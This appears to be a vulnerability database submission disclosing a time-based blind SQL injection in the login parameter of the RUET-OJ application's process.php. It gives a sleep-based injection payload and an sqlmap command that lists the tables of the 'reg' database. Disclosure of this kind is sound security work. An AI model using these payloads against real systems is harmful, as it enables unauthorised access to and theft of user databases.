Submission #674322: shawon100 RUET-OJ BETA 2016 Unauthenticated Time Based Blind SQL Injection

Info

Title: shawon100 RUET-OJ BETA 2016 Unauthenticated Time Based Blind SQL Injection

Description: There is a time-based blind SQL injection vulnerability in the "un" parameter of the process.php file, allowing an attacker to dump the entire database without needing to be logged in. An unauthenticated attacker could insert SQL injection payloads into the "un" parameter of the POST request used to log in to the application. This would allow them to dump the application's database without needing to be logged in.

Affected file: process.php

[POC]
Check for a time-based SQL injection vulnerability:
Send a POST to /process.php with the following payload:
un=TESTE'+and+sleep(5)%23&ps=PASSWORD&uri=home.php
Check the return time using Burp or curl.
Automate with sqlmap to perform the database dump:
sqlmap -u http://<ip>/process.php --data "un=USERNAME&ps=PASSWORD&uri=home.php" -D reg --tables

The person responsible for the application was informed via email on July 25, 2025, but I did not receive a response.
Application link: https://github.com/shawon100/RUET-OJ
User: ManinhuGuitar (UID 84672)
Submission: 13/10/2025 11:12 PM (6 months ago)
Moderation: 27/10/2025 11:22 AM (14 days later)
Status: Accepted
VulDB entry: 330103 [shawon100 RUET OJ up to 18fa45b0a669fa1098a0b8fc629cf6856369d9a5 POST Request /process.php un SQL Injection]
Points: 17
